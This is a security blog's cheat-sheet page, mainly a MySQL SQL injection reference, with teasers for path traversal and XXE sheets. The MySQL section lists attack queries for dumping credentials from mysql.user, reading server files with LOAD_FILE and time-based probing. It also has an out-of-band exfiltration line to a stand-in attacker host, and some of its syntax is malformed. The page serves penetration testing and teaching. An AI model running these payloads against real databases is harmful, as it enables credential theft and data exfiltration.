Categories
Cheat Sheets

SQL Injection Cheat Sheet: MySQL

MSSQL
MySQL

Comments
#
/*
-- -
;%00


Version
SELECT VERSION();
SELECT @@VERSION;
SELECT @@GLOBAL.VERSION;


User details
user()
current_user()
system_user()
session_user()
SELECT user,password FROM mysql.user;


Database details
SELECT db_name();
SELECT database();
SELECT schema_name FROM information_schema.schemata;


Database credentials
SELECT host, user, password FROM mysql.user;


Server details
SELECT @@hostname;


Table Name
SELECT table_name FROM information_schema.tables;


Columns Names
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';


No Quotes
CONCAT(CHAR(97), CHAR(98), CHAR(99))


String Concatenation
CONCAT(foo, bar)

 
Conditionals
SELECT IF(1=1,'true','false');

 
Time-delay
Sleep(10)


Command Execution
http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html


"RunAs"
N/A


Read Files
SELECT LOAD_FILE('C:Windowswin.ini');


Out-of-Band Retrieval
SELECT LOAD_FILE(concat('\\',(SELECT 1), 'attacker.controlledserver.com\')));


Substrings
SELECT substr(‘Foobr’, 1, 1);


Retrieve Nth Line
SELECT * FROM table ORDER BY ID LIMIT 3,1

This article is part of a Series, there are more to read below!
Basics and Defence
Exploitation
Filter Evasion with SQLmap
MySQL Cheat Sheet
MSSQL Cheat Sheet
Out-of-band Exploitation

Categories
Cheat Sheets Web Application Security

Path Traversal Cheat Sheet: Windows

Got a path/directory traversal or file disclosure vulnerability on a Windows-server and need to know some interesting files to hunt for? I’ve got you covered Know any more good files to look for? Let me know! Are you on a Linux server? Try this one instead: Path Traversal Cheat Sheet: Linux

Categories
Cheat Sheets Infrastructure Web Application Security

XXE Cheatsheet – XML External Entity Injection

All the fun of the post on XML External Entities (XXE) but less wordy!

A internal entity:

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
</userInfo>
Categories
Cheat Sheets Web Application Security

Path Traversal Cheat Sheet: Linux

Got a path/directory traversal or file disclosure vulnerability on a Linux-server and need to know some interesting files to hunt for? I’ve got you covered Know any more good files to look for? Let me know!

The list included below contains absolute file paths, remember if you have a traversal attack you can prefix these with encoding traversal strings, like these: